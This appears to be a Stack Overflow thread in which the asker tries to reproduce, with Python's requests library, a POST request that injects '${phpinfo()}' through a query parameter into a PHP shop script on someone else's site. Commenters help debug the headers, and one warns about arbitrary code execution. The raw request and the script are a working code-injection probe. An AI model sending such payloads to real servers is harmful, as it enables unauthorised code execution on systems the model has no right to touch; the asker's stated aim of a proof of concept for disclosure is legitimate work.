# Embed GET request with POST request

Tags: php, python, python-requests, code-injection

This is the request I need to do with Python:

```
POST /do.php?shop_action=buy&action=${phpinfo()} HTTP/1.1
Host: example.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://example.org/do.php?action=shop&shop_action=view&iid=17
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

iid=17&postcode=1&buy=Buy
```

this is what I've tried:

```
import requests

session = requests.Session()

paramsGet = {"action":"\x24{phpinfo()}","shop_action":"buy"}
paramsPost = {"postcode":"1","iid":"17","buy":"Buy"}
headers = {"Accept":"*/*","User-Agent":"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)","Connection":"close","Referer":"http://example.org/do.php?action=shop&shop_action=view&iid=17","Accept-Language":"en","Content-Type":"application/x-www-form-urlencoded"}
response = session.post("http://example.org/do.php", data=paramsPost, params=paramsGet, headers=headers)

print("Response body: %s" % response.content)
```

but it doesn't output what I want (the PHP infos). Why?

Comment: What do you mean by 'embedding a GET request'? You only have *one* request method, there is no GET embedded anywhere here.

Comment: Are you perhaps talking about the URL query string? That's just a URL query string; it is independent from the request method; URL query parameters can be used with any request method, it is not GET specific.

Comment: @MartijnPieters I'm pretty sure you understood what I meant: `/do.php?shop_action=buy&action=${phpinfo()}` I need to post request here

Comment: You are doing that part correctly, but why is your `postcode` value a hex value and not `1` like in the other example?

Comment: The `Content-Type` and `Accept` headers are already set by `requests` and don't need to be manually added.

Comment: @MartijnPieters because I pasted the wrong code, I apologize.

Comment: Why should the server care about the query string if you're performing a POST?

Comment: @IgnacioVazquez-Abrams I don't know, it just cares though.

Comment: I'd also remove the `Connection: close` header from your `headers` dictionary. Other than that, there is nothing wrong with the Python code. It produces the same request as the other (with the addition of a `Accept-Encoding` header).

Comment: @IgnacioVazquez-Abrams: a server is free to use the query string in addition to the POST body. Some servers do.

Comment: @MartijnPieters: Absolutely. But that doesn't mean that the server-side code has to care.

Comment: @MartijnPieters I don't see any `Accept-Encoding` header. I removed `Content-Type`, `Accept` and `Connection: close` headers and it still doesn't produce the output I need.

Comment: @IgnacioVazquez-Abrams: a HTTP server is a black box; it can care about the Earth's magnetic field as far as it is concerned. Which is why this question is otherwise unanswerable. The Python code is correct, if the server is still refusing to cooperate then we can't help any further.

Comment: @JuckEGC: `requests` produces it. Use `http://httpbin.org/post` as the target URL and print the JSON response that produces; it shows what headers were received.

Comment: Back up - you want to be able to send `phpinfo()` in the request, and have your PHP server invoke that function and output the result? That would allow anyone to invoke [arbitrary code](https://en.wikipedia.org/wiki/Arbitrary_code_execution) on your server, which is a huge security exploit. It's not clear what you're [trying to do](https://meta.stackexchange.com/questions/66377/what-is-the-xy-problem), but you *definitely* don't want to do this.

Comment: @dimo414 it's not my server, I've found that vulnerability on a website and I'm trying to create a Proof of Concept sample to report to the administrators.

Comment: Anyone? @MartijnPieters PHP info is still not printed out through my python code.